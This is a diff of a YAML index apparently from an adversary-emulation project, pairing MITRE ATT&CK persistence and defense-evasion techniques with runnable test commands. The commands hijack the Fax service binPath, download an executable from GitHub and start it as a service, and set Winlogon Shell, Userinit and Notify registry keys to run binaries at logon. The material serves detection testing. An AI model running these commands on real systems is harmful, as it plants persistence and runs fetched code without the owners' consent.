execute commands or scripts. \n\nLook + for changes to service Registry entries that do not correlate with known software, + patch cycles, etc. Service information is stored in the Registry at HKLM\\SYSTEM\\CurrentControlSet\\Services. + Changes to the binary path and the service startup type changed from manual + or disabled to automatic, if it does not typically do so, may be suspicious. 
+ Tools such as Sysinternals Autoruns may also be used to detect system service + changes that could be attempts at persistence.(Citation: TechNet Autoruns) + \ \n\nCreation of new services may generate an alterable event (ex: Event + ID 4697 and/or 7045 (Citation: Microsoft 4697 APR 2017)(Citation: Microsoft + Windows Event Forwarding FEB 2018)). New, benign services may be created during + installation of new software.\n\nSuspicious program execution through services + may show up as outlier processes that have not been seen before when compared + against historical data. Look for abnormal process call trees from known services + and for execution of other commands that could relate to Discovery or other + adversary techniques. Data and events should not be viewed in isolation, but + as part of a chain of behavior that could lead to other activities, such as + network connections made for Command and Control, learning details about the + environment through Discovery, and Lateral Movement." + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Windows + identifier: T1543.003 + atomic_tests: + - name: Modify Fax service to run PowerShell + auto_generated_guid: ed366cde-7d12-49df-a833-671904770b9f + description: | + This test will temporarily modify the service Fax by changing the binPath to PowerShell + and will then revert the binPath change, restoring Fax to its original state. + Upon successful execution, cmd will modify the binpath for `Fax` to spawn powershell. Powershell will then spawn. 
+ supported_platforms: + - windows + executor: + name: command_prompt + elevation_required: true + command: | + sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1543.003 Test'\"" + sc start Fax + cleanup_command: sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe" >nul + 2>&1 + - name: Service Installation CMD + auto_generated_guid: 981e2942-e433-44e9-afc1-8c957a1496b6 + description: | + Download an executable from github and start it as a service. + Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout. + supported_platforms: + - windows + input_arguments: + binary_path: + description: Name of the service binary, include path. + type: Path + default: PathToAtomicsFolder\T1543.003\bin\AtomicService.exe + service_name: + description: Name of the Service + type: String + default: AtomicTestService_CMD + dependency_executor_name: powershell + dependencies: + - description: 'Service binary must exist on disk at specified location (#{binary_path}) + +' + prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" + executor: + name: command_prompt + elevation_required: true + command: | + sc.exe create #{service_name} binPath= #{binary_path} + sc.exe start #{service_name} + cleanup_command: | + sc.exe stop #{service_name} >nul 2>&1 + sc.exe delete #{service_name} >nul 2>&1 + - name: Service Installation PowerShell + auto_generated_guid: 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 + description: | + Installs A Local Service via PowerShell. 
+ Upon successful execution, powershell will download `AtomicService.exe` from github. Powershell will then use `New-Service` and `Start-Service` to start service. Results will be displayed. + supported_platforms: + - windows + input_arguments: + binary_path: + description: Name of the service binary, include path. + type: Path + default: PathToAtomicsFolder\T1543.003\bin\AtomicService.exe + service_name: + description: Name of the Service + type: String + default: AtomicTestService_PowerShell + dependency_executor_name: powershell + dependencies: + - description: 'Service binary must exist on disk at specified location (#{binary_path}) + +' + prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" + executor: + name: powershell + elevation_required: true + command: | + New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}" + Start-Service -Name "#{service_name}" + cleanup_command: | + Stop-Service -Name "#{service_name}" 2>&1 | Out-Null + try {(Get-WmiObject Win32_Service -filter "name='#{service_name}'").Delete()} + catch {} + T1547.004: + technique: + created: '2020-01-24T16:59:59.688Z' + modified: '2020-04-21T16:00:41.277Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + id: attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35 + description: "Adversaries may abuse features of Winlogon to execute DLLs and/or + executables when a user logs in. Winlogon.exe is a Windows component responsible + for actions at logon/logoff as well as the secure attention sequence (SAS) + triggered by Ctrl-Alt-Delete. 
Registry entries in HKLM\\Software[\\\\Wow6432Node\\\\]\\Microsoft\\Windows + NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows + NT\\CurrentVersion\\Winlogon\\ are used to manage additional helper + programs and functionalities that support Winlogon. (Citation: Cylance Reg + Persistence Sept 2013) \n\nMalicious modifications to these Registry keys + may cause Winlogon to load and execute malicious DLLs and/or executables. + Specifically, the following subkeys have been known to be possibly vulnerable + to abuse: (Citation: Cylance Reg Persistence Sept 2013)\n\n* Winlogon\\Notify + - points to notification package DLLs that handle Winlogon events\n* Winlogon\\Userinit + - points to userinit.exe, the user initialization program executed when a + user logs on\n* Winlogon\\Shell - points to explorer.exe, the system shell + executed when a user logs on\n\nAdversaries may take advantage of these features + to repeatedly execute malicious code and establish persistence." + name: Winlogon Helper DLL + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1547.004 + url: https://attack.mitre.org/techniques/T1547/004 + - external_id: CAPEC-579 + source_name: capec + url: https://capec.mitre.org/data/definitions/579.html + - url: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order + description: 'Langendorf, S. (2013, September 24). Windows Registry Persistence, + Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.' + source_name: Cylance Reg Persistence Sept 2013 + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. 
+ source_name: TechNet Autoruns + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Praetorian + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Modification' + - 'Module: Module Load' + - 'Command: Command Execution' + x_mitre_detection: |- + Monitor for changes to Registry entries associated with Winlogon that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current Winlogon helper values. (Citation: TechNet Autoruns) New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious. + + Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. + x_mitre_permissions_required: + - SYSTEM + - Administrator + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + identifier: T1547.004 + atomic_tests: + - name: Winlogon Shell Key Persistence - PowerShell + auto_generated_guid: bf9f9d65-ee4d-4c3e-a843-777d04f19c38 + description: | + PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe. + + Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. 
+ supported_platforms: + - windows + input_arguments: + binary_to_execute: + description: Path of binary to execute + type: Path + default: C:\Windows\System32\cmd.exe + executor: + command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" + "Shell" "explorer.exe, #{binary_to_execute}" -Force + +' + cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows + NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore + +' + name: powershell + - name: Winlogon Userinit Key Persistence - PowerShell + auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb + description: | + PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe. + + Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. + supported_platforms: + - windows + input_arguments: + binary_to_execute: + description: Path of binary to execute + type: Path + default: C:\Windows\System32\cmd.exe + executor: + command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" + "Userinit" "Userinit.exe, #{binary_to_execute}" -Force + +' + cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows + NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore + +' + name: powershell + - name: Winlogon Notify Key Logon Persistence - PowerShell + auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9 + description: | + PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon. + + Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon/logoff. 
+ supported_platforms: + - windows + input_arguments: + binary_to_execute: + description: Path of notification package to execute + type: Path + default: C:\Windows\Temp\atomicNotificationPackage.dll + executor: + command: | + New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force + Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force + cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" + -Force -ErrorAction Ignore + +' + name: powershell + T1547.013: + technique: + external_references: + - source_name: mitre-attack + external_id: T1547.013 + url: https://attack.mitre.org/techniques/T1547/013 + - description: Free Desktop. (2006, February 13). Desktop Application Autostart + Specification. Retrieved September 12, 2019. + url: https://specifications.freedesktop.org/autostart-spec/autostart-spec-latest.html + source_name: Free Desktop Application Autostart Feb 2006 + - description: Free Desktop. (2017, December 24). Recognized Desktop Entry Keys. + Retrieved September 12, 2019. + url: https://specifications.freedesktop.org/desktop-entry-spec/1.2/ar01s06.html + source_name: Free Desktop Entry Keys + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: XDG Autostart Entries + description: |- + Adversaries may modify XDG autostart entries to execute programs or commands during system boot. Linux desktop environments that are XDG compliant implement functionality for XDG autostart entries. These entries will allow an application to automatically start during the startup of a desktop environment after user logon. 
By default, XDG autostart entries are stored within the /etc/xdg/autostart or ~/.config/autostart directories and have a .desktop file extension.(Citation: Free Desktop Application Autostart Feb 2006) + + Within an XDG autostart entry file, the Type key specifies if the entry is an application (type 1), link (type 2) or directory (type 3). The Name key indicates an arbitrary name assigned by the creator and the Exec key indicates the application and command line arguments to execute.(Citation: Free Desktop Entry Keys) + + Adversaries may use XDG autostart entries to maintain persistence by executing malicious commands and payloads, such as remote access tools, during the startup of a desktop environment. Commands included in XDG autostart entries with execute after user logon in the context of the currently logged on user. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make XDG autostart entries look as if they are associated with legitimate programs. + id: attack-pattern--e0232cb0-ded5-4c2e-9dc7-2893142a5c11 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-11-10T15:55:10.103Z' + created: '2019-09-10T18:13:12.195Z' + x_mitre_is_subtechnique: true + x_mitre_contributors: + - Tony Lambert, Red Canary + x_mitre_detection: "Malicious XDG autostart entries may be detected by auditing + file creation and modification events within the /etc/xdg/autostart + and ~/.config/autostart directories. Depending on individual + configurations, defenders may need to query the environment variables $XDG_CONFIG_HOME + or $XDG_CONFIG_DIRS to determine the paths of Autostart entries. + Autostart entry files not associated with legitimate packages may be considered + suspicious. 
Suspicious entries can also be identified by comparing entries + to a trusted system baseline.\n \nSuspicious processes or scripts spawned + in this manner will have a parent process of the desktop component implementing + the XDG specification and will execute as the logged on user." + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_version: '1.0' + x_mitre_permissions_required: + - User + - root + x_mitre_platforms: + - Linux + atomic_tests: [] +defense-evasion: + T1548: + technique: + external_references: + - source_name: mitre-attack + external_id: T1548 + url: https://attack.mitre.org/techniques/T1548 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Abuse Elevation Control Mechanism + description: Adversaries may circumvent mechanisms designed to control elevate + privileges to gain higher-level permissions. Most modern systems contain native + elevation control mechanisms that are intended to limit privileges that a + user can perform on a machine. Authorization has to be granted to specific + users in order to perform tasks that can be considered of higher risk. An + adversary can perform several methods to take advantage of built-in control + mechanisms in order to escalate privileges on a system. 
+ id: attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-07-22T21:36:52.825Z' + created: '2020-01-30T13:58:14.373Z' + x_mitre_data_sources: + - 'Process: Process Metadata' + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + - 'File: File Metadata' + - 'File: File Modification' + - 'Process: OS API Execution' + x_mitre_permissions_required: + - Administrator + - User + x_mitre_detection: |- + Monitor the file system for files that have the setuid or setgid bits set. Also look for any process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes. On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). + + Consider monitoring for /usr/libexec/security_authtrampoline executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling. + + On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file. 
+ + There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. Analysts should monitor Registry settings for unauthorized changes. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - Linux + - macOS + - Windows + atomic_tests: [] + T1134: + technique: + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1134 + url: https://attack.mitre.org/techniques/T1134 + - external_id: CAPEC-633 + source_name: capec + url: https://capec.mitre.org/data/definitions/633.html + - url: https://pentestlab.blog/2017/04/03/token-manipulation/ + description: netbiosX. (2017, April 3). Token Manipulation. Retrieved April + 21, 2017. + source_name: Pentestlab Token Manipulation + - url: https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing + description: Mathers, B. (2017, March 7). Command line process auditing. Retrieved + April 21, 2017. + source_name: Microsoft Command-line Logging + - url: https://msdn.microsoft.com/en-us/library/windows/desktop/aa378184(v=vs.85).aspx + description: Microsoft TechNet. (n.d.). Retrieved April 25, 2017. + source_name: Microsoft LogonUser + - url: https://msdn.microsoft.com/en-us/library/windows/desktop/aa446617(v=vs.85).aspx + description: Microsoft TechNet. (n.d.). Retrieved April 25, 2017. + source_name: Microsoft DuplicateTokenEx + - url: https://msdn.microsoft.com/en-us/library/windows/desktop/aa378612(v=vs.85).aspx + description: Microsoft TechNet. (n.d.). 
Retrieved April 25, 2017. + source_name: Microsoft ImpersonateLoggedOnUser + - url: https://www.blackhat.com/docs/eu-17/materials/eu-17-Atkinson-A-Process-Is-No-One-Hunting-For-Token-Manipulation.pdf + description: 'Atkinson, J., Winchester, R. (2017, December 7). A Process is + No One: Hunting for Token Manipulation. Retrieved December 21, 2017.' + source_name: BlackHat Atkinson Winchester Token Manipulation + description: |- + Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token. + + An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These token can then be applied to an existing process (i.e. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001)) or used to spawn a new process (i.e. [Create Process with Token](https://attack.mitre.org/techniques/T1134/002)). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.(Citation: Pentestlab Token Manipulation) + + Any standard user can use the runas command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. 
There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens. + name: Access Token Manipulation + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--dcaa092b-7de9-4a21-977f-7fcb77e89c48 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-04-24T13:40:52.952Z' + created: '2017-12-14T16:46:06.044Z' + x_mitre_defense_bypassed: + - Windows User Account Control + - System access controls + - File system access controls + - Heuristic Detection + - Host forensic analysis + x_mitre_is_subtechnique: false + x_mitre_version: '2.0' + x_mitre_contributors: + - Tom Ueltschi @c_APT_ure + - Travis Smith, Tripwire + - Robby Winchester, @robwinchester3 + - Jared Atkinson, @jaredcatkinson + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Process: Process Metadata' + - 'Process: OS API Execution' + - 'User Account: User Account Metadata' + - 'Active Directory: Active Directory Object Modification' + - 'Command: Command Execution' x_mitre_detection: "If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. 
@@ -26430,17 +18352,17 @@ defense-evasion: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: lateral-movement - modified: '2020-09-16T19:40:02.024Z' + modified: '2021-04-14T18:09:45.539Z' created: '2020-01-30T17:37:22.261Z' - x_mitre_version: '1.1' + x_mitre_version: '1.2' x_mitre_is_subtechnique: true x_mitre_defense_bypassed: - System Access Controls x_mitre_detection: Monitor access token activity for abnormal use and permissions granted to unusual or suspicious applications and APIs. x_mitre_data_sources: - - Office 365 audit logs - - OAuth audit logs + - 'Web Credential: Web Credential Usage' + - 'Application Log: Application Log Content' x_mitre_contributors: - Shailesh Tiwary (Indian Army) - Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC) @@ -26449,6 +18371,7 @@ defense-evasion: x_mitre_platforms: - Office 365 - SaaS + - Google Workspace atomic_tests: [] T1055.004: technique: @@ -26475,7 +18398,7 @@ defense-evasion: description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 + source_name: Elastic Process Injection July 2017 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 
@@ -26507,14 +18430,14 @@ defense-evasion: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: privilege-escalation - modified: '2020-06-20T22:17:05.394Z' + modified: '2020-11-10T18:29:30.961Z' created: '2020-01-14T01:29:43.786Z' x_mitre_defense_bypassed: - Application control - Anti-virus x_mitre_data_sources: - - Process monitoring - - API monitoring + - 'Process: OS API Execution' + - 'Process: Process Access' x_mitre_detection: "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances @@ -26523,7 +18446,7 @@ defense-evasion: such as SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC/NtQueueApcThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, - may be used for this technique.(Citation: Endgame Process Injection July 2017)\n\nAnalyze + may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. " 
@@ -26561,13 +18484,13 @@ defense-evasion: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: BITS Jobs description: |- - Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM). (Citation: Microsoft COM) (Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations. + Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations. - The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) (Citation: Microsoft BITS) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool. 
(Citation: Microsoft BITSAdmin) + The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin) - Adversaries may abuse BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls. (Citation: CTU BITS Malware June 2016) (Citation: Mondok Windows PiggyBack BITS May 2007) (Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots). (Citation: PaloAlto UBoatRAT Nov 2017) (Citation: CTU BITS Malware June 2016) + Adversaries may abuse BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016) - BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). 
(Citation: CTU BITS Malware June 2016) + BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016) external_references: - source_name: mitre-attack external_id: T1197 @@ -26603,6 +18526,11 @@ defense-evasion: description: Microsoft. (2011, July 19). Issues with BITS. Retrieved January 12, 2018. source_name: Microsoft Issues with BITS July 2011 + - source_name: Elastic - Hunting for Persistence Part 1 + url: https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1 + description: 'French, D., Murphy, B. (2020, March 24). Adversary tradecraft + 101: Hunting for persistence using Elastic Security (Part 1). Retrieved + December 21, 2020.' object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 type: attack-pattern @@ -26611,7 +18539,7 @@ defense-evasion: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: persistence - modified: '2020-03-25T23:28:10.049Z' + modified: '2021-04-13T21:36:04.956Z' created: '2018-04-18T17:59:24.739Z' x_mitre_is_subtechnique: false x_mitre_platforms: 
@@ -26621,23 +18549,25 @@ defense-evasion: - Administrator - SYSTEM x_mitre_detection: |- - BITS runs as a service and its status can be checked with the Sc query utility (sc query bits). (Citation: Microsoft Issues with BITS July 2011) Active BITS tasks can be enumerated using the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (bitsadmin /list /allusers /verbose). (Citation: Microsoft BITS) + BITS runs as a service and its status can be checked with the Sc query utility (sc query bits).(Citation: Microsoft Issues with BITS July 2011) Active BITS tasks can be enumerated using the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (bitsadmin /list /allusers /verbose).(Citation: Microsoft BITS) - Monitor usage of the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (especially the ‘Transfer’, 'Create', 'AddFile', 'SetNotifyFlags', 'SetNotifyCmdLine', 'SetMinRetryDelay', 'SetCustomHeaders', and 'Resume' command options) (Citation: Microsoft BITS)Admin and the Windows Event log for BITS activity. Also consider investigating more detailed information about jobs by parsing the BITS job database. (Citation: CTU BITS Malware June 2016) + Monitor usage of the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (especially the ‘Transfer’, 'Create', 'AddFile', 'SetNotifyFlags', 'SetNotifyCmdLine', 'SetMinRetryDelay', 'SetCustomHeaders', and 'Resume' command options)(Citation: Microsoft BITS) Admin logs, PowerShell logs, and the Windows Event log for BITS activity.(Citation: Elastic - Hunting for Persistence Part 1) Also consider investigating more detailed information about jobs by parsing the BITS job database.(Citation: CTU BITS Malware June 2016) - Monitor and analyze network activity generated by BITS. BITS jobs use HTTP(S) and SMB for remote connections and are tethered to the creating user and will only function when that user is logged on (this rule applies even if a user attaches the job to a service account). 
(Citation: Microsoft BITS) + Monitor and analyze network activity generated by BITS. BITS jobs use HTTP(S) and SMB for remote connections and are tethered to the creating user and will only function when that user is logged on (this rule applies even if a user attaches the job to a service account).(Citation: Microsoft BITS) x_mitre_defense_bypassed: - Firewall - Host forensic analysis x_mitre_data_sources: - - Process monitoring - - Process command-line parameters - - Packet capture - - Windows event logs + - 'Process: Process Creation' + - 'Network Traffic: Network Connection Creation' + - 'Service: Service Metadata' + - 'Command: Command Execution' x_mitre_contributors: + - Brent Murphy, Elastic + - David French, Elastic - Ricardo Dias - Red Canary - x_mitre_version: '1.1' + x_mitre_version: '1.2' identifier: T1197 atomic_tests: - name: Bitsadmin Download (cmd) 
@@ -26767,6 +18697,31 @@ defense-evasion: name: command_prompt T1027.001: technique: + created: '2020-02-05T14:04:25.865Z' + modified: '2020-09-17T18:25:33.828Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + id: attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5 + description: "Adversaries may use binary padding to add junk data and change + the on-disk representation of malware. This can be done without affecting + the functionality or behavior of a binary, but can increase the size of the + binary beyond what some security tools are capable of handling due to file + size limitations. \n\nBinary padding effectively changes the checksum of the + file and can also be used to avoid hash-based blocklists and static anti-virus + signatures.(Citation: ESET OceanLotus) The padding used is commonly generated + by a function to create junk data and then appended to the end or applied + to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing + the file size may decrease the effectiveness of certain tools and detection + capabilities that are not designed or configured to scan large files. This + may also reduce the likelihood of being collected for analysis. Public file + scanning services, such as VirusTotal, limits the maximum size of an uploaded + file to be analyzed.(Citation: VirusTotal FAQ) " + name: Binary Padding + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1027.001 
@@ -26788,53 +18743,26 @@ defense-evasion: - source_name: VirusTotal FAQ url: https://www.virustotal.com/en/faq/ description: VirusTotal. (n.d.). VirusTotal FAQ. Retrieved May 23, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Binary Padding - description: "Adversaries may use binary padding to add junk data and change - the on-disk representation of malware. This can be done without affecting - the functionality or behavior of a binary, but can increase the size of the - binary beyond what some security tools are capable of handling due to file - size limitations. \n\nBinary padding effectively changes the checksum of the - file and can also be used to avoid hash-based blocklists and static anti-virus - signatures.(Citation: ESET OceanLotus) The padding used is commonly generated - by a function to create junk data and then appended to the end or applied - to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing - the file size may decrease the effectiveness of certain tools and detection - capabilities that are not designed or configured to scan large files. This - may also reduce the likelihood of being collected for analysis. 
Public file - scanning services, such as VirusTotal, limits the maximum size of an uploaded - file to be analyzed.(Citation: VirusTotal FAQ) " - id: attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-09-17T18:25:33.828Z' - created: '2020-02-05T14:04:25.865Z' - x_mitre_contributors: - - Martin Jirkal, ESET - x_mitre_data_sources: - - Process monitoring - - Binary file metadata - - File monitoring - - Malware reverse engineering + x_mitre_defense_bypassed: + - Anti-virus + - Signature-based detection + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' x_mitre_detection: 'Depending on the method used to pad files, a file-based signature may be capable of detecting padding using a scanning or on-access based tool. When executed, the resulting process from padded files may also exhibit other behavior characteristics of being used to conduct an intrusion such as system and network information Discovery or Lateral Movement, which could be used as event indicators that point to the source file. ' - x_mitre_version: '1.1' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_defense_bypassed: - - Anti-virus - - Signature-based detection + 